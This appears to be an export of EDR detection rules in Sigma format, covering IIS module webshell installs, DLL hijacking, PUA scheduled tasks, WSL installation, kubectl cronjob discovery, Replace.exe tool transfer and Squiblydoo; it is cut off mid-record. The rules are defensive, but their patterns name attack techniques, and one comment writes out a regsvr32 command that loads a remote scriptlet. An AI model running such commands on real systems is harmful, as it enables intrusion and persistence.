"https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/",
"https://attack.mitre.org/techniques/T1505/004/"
],
"name": "t1505_004_iis_module_appcmd_install.yml",
"content": "title: Suspicious IIS Module Addition via appcmd\nid: 9ba2245e-e5dd-4b2a-9413-0bc8080755cf\ndescription: |\n Detects the suspicious addition of an IIS module via 'appcmd.exe' command, out of known usual contexts.\n IIS modules can be integrated into the IIS server to provide additional server functionalities.\n They are also leveraged by malicious actors as persistent webshells, but must first be deployed using integration commands or scripts.\n It is recommended to list modules that are loaded by IIS ('appcmd.exe list modules') as to check for unknown ones and analyze them.\nreferences:\n - https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview#to-install-a-module-using-appcmdexe\n - https://learn.microsoft.com/en-us/iis/configuration/system.webserver/globalmodules/add#appcmdexe\n - https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/\n - https://attack.mitre.org/techniques/T1505/004/\ndate: 2023/11/24\nmodified: 2025/09/26\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName: 'appcmd.exe'\n CommandLine|re:\n - '(?i)\\b(?:install|add)\\s+module\\s+'\n - '(?i)\\bset\\s+config\\s+-section:system\\.webServer/(?:globalModules|modules)\\s+'\n\n filter_parent:\n - ParentImage:\n - '?:\\Windows\\sys*\\msiexec.exe'\n - '?:\\Windows\\system32\\inetsrv\\iissetup.exe'\n - '?:\\Program Files\\Microsoft Configuration Manager\\bin\\x64\\smsexec.exe'\n - '*\\SMS\\bin\\i386\\smsexec.exe'\n - '*\\ExSetup.exe'\n - '*\\ExSetupUI.exe'\n - GrandparentImage:\n - '?:\\Windows\\sys*\\msiexec.exe'\n - '?:\\Windows\\system32\\inetsrv\\iissetup.exe'\n - 
'?:\\Program Files\\Microsoft Configuration Manager\\bin\\x64\\smsexec.exe'\n - '*\\SMS\\bin\\i386\\smsexec.exe'\n - '*\\ExSetup.exe'\n - '*\\ExSetupUI.exe'\n\n filter_legitimate_modules:\n CommandLine|contains:\n - '/name:SCCMDeviceCertAuthModule /add:true /image:*\\SMS_CCM\\DeviceCertAuthModule.dll'\n - '/name:SCCMDeviceCertAuthModule /add:true /image:*\\CCM\\DeviceCertAuthModule.dll'\n - '/name:SCCMContentAuthModule /add:true /image:?:\\Windows\\System32\\inetsrv\\ContentAuthModule.dll'\n - '/name:AspNetCoreModuleV2 /image:%IIS_BIN%\\Asp.Net Core Module\\V2\\aspnetcorev2.dll'\n - '/name:AspNetCoreModule /image:%IIS_BIN%\\aspnetcore.dll'\n - '/image:?:\\Synapse\\OSD\\NativeModules\\\\*.dll /commit:appHost'\n\n exclusion_ge_dakota:\n ParentImage: '?:\\Program Files\\GE Healthcare\\GE*\\DakotaConfig.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'General Electric Company'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nfalsepositives:\n - Some custom deployment scripts or binaries can legitimately leverage appcmd to install unusual IIS modules.\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9ba2245e-e5dd-4b2a-9413-0bc8080755cf",
"rule_name": "Suspicious IIS Module Addition via appcmd",
"rule_description": "Detects the suspicious addition of an IIS module via 'appcmd.exe' command, out of known usual contexts.\nIIS modules can be integrated into the IIS server to provide additional server functionalities.\nThey are also leveraged by malicious actors as persistent webshells, but must first be deployed using integration commands or scripts.\nIt is recommended to list the modules loaded by IIS ('appcmd.exe list modules') so as to check for unknown ones and analyze them.\n",
"rule_creation_date": "2023-11-24",
"rule_modified_date": "2025-09-26",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1505.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9bd41fa6-1686-4e56-9acb-9d309bc02843",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093528Z",
"creation_date": "2026-03-23T11:45:34.093530Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093534Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_gpapi.yml",
"content": "title: DLL Hijacking via gpapi.exe\nid: 9bd41fa6-1686-4e56-9acb-9d309bc02843\ndescription: |\n Detects potential Windows DLL Hijacking via gpapi.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'gpapi.exe'\n ImageLoaded|endswith: '\\gpapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9bd41fa6-1686-4e56-9acb-9d309bc02843",
"rule_name": "DLL Hijacking via gpapi.exe",
"rule_description": "Detects potential Windows DLL Hijacking via gpapi.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9bf08b63-9d7a-4ba3-9470-11a8e9f8cbdd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607274Z",
"creation_date": "2026-03-23T11:45:34.607278Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607285Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.fbi.gov/contact-us/field-offices/denver/news/fbi-denver-warns-of-online-file-converter-scam",
"https://www.bleepingcomputer.com/news/security/fbi-warnings-are-true-fake-file-converters-do-push-malware/",
"https://expel.com/blog/you-dont-find-manualfinder-manualfinder-finds-you/",
"https://www.truesec.com/hub/blog/tamperedchef-the-bad-pdf-editor",
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_005_scheduled_task_pua.yml",
"content": "title: Scheduled Task Related to PUA\nid: 9bf08b63-9d7a-4ba3-9470-11a8e9f8cbdd\ndescription: |\n Detects the execution of suspicious processes spawned by a scheduled task related to a Potentially Unwanted Application (PUA).\n Attackers use fake online file converter tools to deliver malicious payloads alongside converted files, enabling data theft or ransomware deployment.\n It is recommended to investigate the scheduled task and the executed binary to determine its legitimacy.\nreferences:\n - https://www.fbi.gov/contact-us/field-offices/denver/news/fbi-denver-warns-of-online-file-converter-scam\n - https://www.bleepingcomputer.com/news/security/fbi-warnings-are-true-fake-file-converters-do-push-malware/\n - https://expel.com/blog/you-dont-find-manualfinder-manualfinder-finds-you/\n - https://www.truesec.com/hub/blog/tamperedchef-the-bad-pdf-editor\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2025/09/02\nmodified: 2025/09/03\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.PUA.MaliciousApp\n - classification.Windows.Behavior.ScheduledTask\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n GrandparentCommandLine|endswith:\n - '\\svchost.exe -k netsvcs -p -s Schedule' # windows 10 Version 1703 and above\n - '\\svchost.exe -k netsvcs -p' # windows versions before 1703\n - '\\taskeng.exe' # on older windows versions\n OriginalFileName: 'node.exe'\n Image|contains: '\\Users\\\\*\\AppData\\'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9bf08b63-9d7a-4ba3-9470-11a8e9f8cbdd",
"rule_name": "Scheduled Task Related to PUA",
"rule_description": "Detects the execution of suspicious processes spawned by a scheduled task related to a Potentially Unwanted Application (PUA).\nAttackers use fake online file converter tools to deliver malicious payloads alongside converted files, enabling data theft or ransomware deployment.\nIt is recommended to investigate the scheduled task and the executed binary to determine its legitimacy.\n",
"rule_creation_date": "2025-09-02",
"rule_modified_date": "2025-09-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9bfddc67-d9dd-43d5-a677-c0076684a695",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.297283Z",
"creation_date": "2026-03-23T11:45:35.297285Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297290Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows/wsl/install",
"https://blog.qualys.com/vulnerabilities-threat-research/2022/03/22/implications-of-windows-subsystem-for-linux-for-adversaries-defenders-part-1",
"https://blog.qualys.com/vulnerabilities-threat-research/2022/04/20/implications-of-windows-subsystem-for-linux-for-adversaries-defenders-part-2",
"https://en.wikipedia.org/wiki/Windows_Subsystem_for_Linux",
"https://attack.mitre.org/techniques/T1202/"
],
"name": "t1202_wsl_feature_enabled.yml",
"content": "title: Windows Subsystem for Linux (WSL) Feature Installed\nid: 9bfddc67-d9dd-43d5-a677-c0076684a695\ndescription: |\n Detects the installation of the Windows Subsystem for Linux (WSL) feature.\n While WSL has legitimate uses, threat actors may abuse it to run Linux-based tools and malware, potentially bypassing Windows security controls.\n The installation of WSL should be monitored and correlated with other suspicious activities that might indicate malicious use.\nreferences:\n - https://docs.microsoft.com/en-us/windows/wsl/install\n - https://blog.qualys.com/vulnerabilities-threat-research/2022/03/22/implications-of-windows-subsystem-for-linux-for-adversaries-defenders-part-1\n - https://blog.qualys.com/vulnerabilities-threat-research/2022/04/20/implications-of-windows-subsystem-for-linux-for-adversaries-defenders-part-2\n - https://en.wikipedia.org/wiki/Windows_Subsystem_for_Linux\n - https://attack.mitre.org/techniques/T1202/\ndate: 2025/01/13\nmodified: 2026/03/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1202\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: CreateKey\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Lxss'\n\n condition: selection\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9bfddc67-d9dd-43d5-a677-c0076684a695",
"rule_name": "Windows Subsystem for Linux (WSL) Feature Installed",
"rule_description": "Detects the installation of the Windows Subsystem for Linux (WSL) feature.\nWhile WSL has legitimate uses, threat actors may abuse it to run Linux-based tools and malware, potentially bypassing Windows security controls.\nThe installation of WSL should be monitored and correlated with other suspicious activities that might indicate malicious use.\n",
"rule_creation_date": "2025-01-13",
"rule_modified_date": "2026-03-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1202"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9bffe914-ce34-4ae1-8879-0978e6753e3e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613194Z",
"creation_date": "2026-03-23T11:45:34.613198Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613205Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md",
"https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/",
"https://attack.mitre.org/techniques/T1053/007/"
],
"name": "t1053_007_crontab_kubectl_discovery.yml",
"content": "title: Kubectl Scheduled Tasks List Fetched\nid: 9bffe914-ce34-4ae1-8879-0978e6753e3e\ndescription: |\n Detects the execution of the kubectl \"get cronjob\" command to fetch Kubernetes CronJobs.\n An attacker can use the list of Kubernetes CronJobs to inject malicious behaviour in an unprotected Job.\n It is recommended to investigate the parent process and correlate this alert to any CronJob modifications to look for malicious content.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md\n - https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/\n - https://attack.mitre.org/techniques/T1053/007/\ndate: 2023/03/05\nmodified: 2025/05/14\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1053.007\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/kubectl'\n CommandLine|contains: 'get cronjob'\n\n exclusion_centreon:\n - ProcessAncestors|contains: '/usr/bin/perl|/usr/sbin/centengine|'\n - ProcessCommandLine|startswith: '/usr/bin/perl /usr/lib/centreon/plugins/'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9bffe914-ce34-4ae1-8879-0978e6753e3e",
"rule_name": "Kubectl Scheduled Tasks List Fetched",
"rule_description": "Detects the execution of the kubectl \"get cronjob\" command to fetch Kubernetes CronJobs.\nAn attacker can use the list of Kubernetes CronJobs to inject malicious behaviour in an unprotected Job.\nIt is recommended to investigate the parent process and correlate this alert to any CronJob modifications to look for malicious content.\n",
"rule_creation_date": "2023-03-05",
"rule_modified_date": "2025-05-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1053.007"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9c030998-dfcb-45fc-bd74-0c1f38a2d18d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603344Z",
"creation_date": "2026-03-23T11:45:34.603347Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603355Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Replace/",
"https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1105_replace_ingress_tool_transfer.yml",
"content": "title: Possible Ingress Tool Transfer via Replace.exe\nid: 9c030998-dfcb-45fc-bd74-0c1f38a2d18d\ndescription: |\n Detects a suspicious execution of Replace.exe to replace a file.\n Adversaries may use Replace.exe to transfer or copy tools or other files from local or external system into a compromised environment.\n It is recommended to check the content of the newly created file and other actions made by the parent process for malicious purpose.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Replace/\n - https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2022/12/02\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Replace\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.FileDownload\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\replace.exe'\n OriginalFileName: 'REPLACE.EXE'\n\n exclusion_commandline:\n ProcessCommandLine:\n - '?:\\WINDOWS\\system32\\replace.exe'\n - '?:\\WINDOWS\\system32\\replace.exe /?'\n\n exclusion_cygwin:\n ParentImage|endswith: '\\cygwin\\bin\\bash.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9c030998-dfcb-45fc-bd74-0c1f38a2d18d",
"rule_name": "Possible Ingress Tool Transfer via Replace.exe",
"rule_description": "Detects a suspicious execution of Replace.exe to replace a file.\nAdversaries may use Replace.exe to transfer or copy tools or other files from local or external system into a compromised environment.\nIt is recommended to check the content of the newly created file and other actions made by the parent process for malicious purpose.\n",
"rule_creation_date": "2022-12-02",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9c0f1e65-1213-4bb9-9982-65fc698464c7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074512Z",
"creation_date": "2026-03-23T11:45:34.074514Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074519Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992",
"https://attack.mitre.org/techniques/T1574/001/",
"https://attack.mitre.org/techniques/T1574/002/"
],
"name": "t1574_001_persistence_dll_hijack_sessionenv_tsmsisrv_tsvipsrv.yml",
"content": "title: SessionEnv Service DLL Hijack Detected\nid: 9c0f1e65-1213-4bb9-9982-65fc698464c7\ndescription: |\n Detects the execution of a DLL hijack of the SessionEnv service trying to load the non-existent TSMSISrv.dll or TSVIPSrv.dll DLLs from the system32 directory (the DLLs are actually searched in multiple directories in the search path).\n Attackers can use this DLL hijack to establish persistence by planting a malicious DLL that will be executed upon the start of the SessionEnv service.\n It is recommended to analyze the loaded DLL for malicious contents, as well as to analyze the process responsible for its creation.\nreferences:\n - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992\n - https://attack.mitre.org/techniques/T1574/001/\n - https://attack.mitre.org/techniques/T1574/002/\ndate: 2020/10/02\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.defense_evasion\n - attack.t1574.001\n - attack.t1574.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded:\n - '*\\TSMSISrv.dll'\n - '*\\TSVIPSrv.dll'\n Image|endswith: '\\svchost.exe'\n\n filter_signed:\n # on windows server 2019, the 2 DLL ARE present and signed...\n Signature|contains: \"Microsoft Windows\"\n\n exclusion_legit:\n sha256:\n - 'ba7047bf1650b072bed9d3abb3334866c04c28f968066b31ab13a1e7e5b4b3b5' # TSVIPSrv.dll version 6.1.7601.17514 (win7sp1_rtm.101119-1850)\n - 'e5bb0a7e9d9b5733cb078e9da5d7232cce2cc4442b14d8b1f0d3a9e6f1117483' # TSMSISrv.dll version 6.1.7601.17514 (win7sp1_rtm.101119-1850)\n - '1b0d7abf1d3632dcf16dcba1c6c085d82f30c0d412a4cc4c355cfc649be078a5' # TSVIPSrv.dll version 6.3.9600.16384 (winblue_rtm.130821-1623)\n - '601fd73e2f24312b0f891b7d4bb22cffa5285e32437f4941de14ab1bcf11e404' # TSMSISrv.dll version 6.3.9600.16384 (winblue_rtm.130821-1623)\n - 'f279853d20ea6212a3f78c754b4c414acaa2f074d385baaedade0359cb6f60ea' # TSVIPSrv.dll version 6.1.7601.23403 (win7sp1_ldr.160325-0600)\n - '530db7da2e75330ad9338eb0ce80bf8b7270b9365e25e094836edbe391cdc2ba' # TSMSISrv.dll version 6.1.7601.23403 (win7sp1_ldr.160325-0600)\n - '9a3bb9988f457272d1f0f200594f8e80fc8065aef22b6badd1396e6a1374aa50' # TSMSISrv.dll version 10.0.17763.1697 (WinBuild.160101.0800)\n - 'ab433507cf4c5f3a1afd4c41c03388e11f66e978b8ba54e15c44fee422e0f38c' # TSVIPSrv.dll version 10.0.17763.1 (WinBuild.160101.0800)\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9c0f1e65-1213-4bb9-9982-65fc698464c7",
"rule_name": "SessionEnv Service DLL Hijack Detected",
"rule_description": "Detects the execution of a DLL hijack of the SessionEnv service trying to load the non-existent TSMSISrv.dll or TSVIPSrv.dll DLLs from the system32 directory (the DLLs are actually searched in multiple directories in the search path).\nAttackers can use this DLL hijack to establish persistence by planting a malicious DLL that will be executed upon the start of the SessionEnv service.\nIt is recommended to analyze the loaded DLL for malicious contents, as well as to analyze the process responsible for its creation.\n",
"rule_creation_date": "2020-10-02",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1574.001",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9c113891-aff7-41d7-9b05-faa3ef67baf0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085484Z",
"creation_date": "2026-03-23T11:45:34.085486Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085491Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://car.mitre.org/analytics/CAR-2019-04-003/",
"https://attack.mitre.org/techniques/T1218/010/"
],
"name": "t1218_010_squiblydoo_renamed.yml",
"content": "title: Possible Library Squiblydoo Attack Detected\nid: 9c113891-aff7-41d7-9b05-faa3ef67baf0\ndescription: |\n Detects a renamed scrobj.dll being loaded by regsvr32, a technique also known as Squiblydoo.\n Squiblydoo is a specific usage of regsvr32 to load a COM scriptlet directly from the Internet and execute it in a way that bypasses application whitelisting.\n It is recommended to investigate URLs in the command-line of the regsvr32 process, as well as network connections and other surrounding telemetries to determine if this action was legitimate.\nreferences:\n - https://car.mitre.org/analytics/CAR-2019-04-003/\n - https://attack.mitre.org/techniques/T1218/010/\ndate: 2021/03/31\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.010\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.LOLBin.Regsvr32\n - classification.Windows.LOLBin.Scrobj\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n # copy C:\\windows\\system32\\scrobj.dll C:\\temp\\my.dll\n # regsvr32.exe -u -s -i:https://google.fr c:\\temp\\my.dll\n selection:\n Image|endswith: '\\regsvr32.exe'\n OriginalFileName: 'scrobj.dll'\n\n filter_scrobj:\n ImageLoaded|contains: 'scrobj'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
